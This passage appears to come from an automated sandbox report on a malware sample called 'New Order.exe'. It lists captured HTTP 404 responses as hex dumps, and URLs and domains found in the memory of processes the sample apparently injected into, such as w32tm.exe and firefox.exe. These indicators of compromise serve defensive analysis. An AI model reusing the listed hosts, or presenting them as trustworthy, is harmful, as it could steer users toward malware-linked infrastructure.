b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:40:58 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:01 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: brData Raw: 62 65 0d 0a a1 d0 09 00 20 06 ad ab 6f 49 73 1d 8c 90 23 de 5c 6f 21 77 77 36 48 26 d1 6c 4a f0 f2 bd 09 4d 88 22 4d a6 a7 3e 17 0c eb b2 4b 9a 7e 14 ca c9 ed 66 2c 5c 14 4c 50 b4 56 12 da 58 d4 d8 43 b7 f1 38 51 86 60 3d 8b 2c cf 71 6e 26 79 b0 bf ce 27 6d 5d 04 f3 3d 64 5e 46 76 7d 41 c3 3c a3 16 13 c8 19 67 85 3f 71 dd 09 9a df 73 27 68 44 b9 69 8d ae 43 40 4d 59 af b0 d5 42 be d3 13 97 eb 0b 6d 47 fc f5 01 ed 35 56 e1 6e a1 0c 74 d7 d3 9f c6 84 22 3c e9 1d 92 e5 f5 65 b0 75 bd c2 b3 b1 37 31 e2 fd 5c 63 ba c0 0d 30 58 56 36 8d 2b ae ff 11 ab c3 a3 05 ca de a4 70 43 70 04 0d 0a 30 0d 0a 0d 0a Data Ascii: be oIs#\o!ww6H&lJM"M>K~f,\LPVXC8Q`=,qn&y'm]=d^Fv}A<g?qs'hDiC@MYBmG5Vnt"<eu71\c0XV6+pCp0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:10 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:41:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 03 Dec 2024 13:41:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-03T13:41:39.4849300Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:41:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://conseilnsaftogo.org/wp-json/>; rel="https://api.w.org/"Data Raw: 33 66 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 6e 73 65 69 6c 6e 73 61 66 74 6f 67 6f 2e 6f 72 67 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c 20 5b 73 69 7a 65 73 5e 3d 22 61 75 74 6f 2c 22 20 69 5d 29 20 7b 20 63 6f 6e 74 61 69 6e 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 3a 20 33 30 30 30 70 78 20 31 35 30 30 70 78 20 7d 3c 2f 73 74 79 6c 65 3e 0a 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 38 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4e 53 41 46 20 2d 20 54 4f 47 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4e 53 41 46 20 2d 20 54 4f 47 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 53 41 46 20 2d 20 54 4f 47 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: w32tm.exe, 0000000E.00000002.4635164547.000000000399C000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000002E1C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2797262924.0000000028B5C000.00000004.80000000.00040000.00000000.sdmp, New Order.exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: New Order.exe, 00000001.00000002.2168677711.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/614_Genetics_Online_Activity.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/614_Genetics_Online_Class.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2F
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/614_Genetics_Online_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/614_Genetics_Online_Game.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2Fe
                Source: w32tm.exe, 0000000E.00000002.4637249774.00000000062B0000.00000004.00000800.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4635164547.0000000004882000.00000004.10000000.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4634099504.0000000003D02000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/Genetics_Online_College_Course.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWN
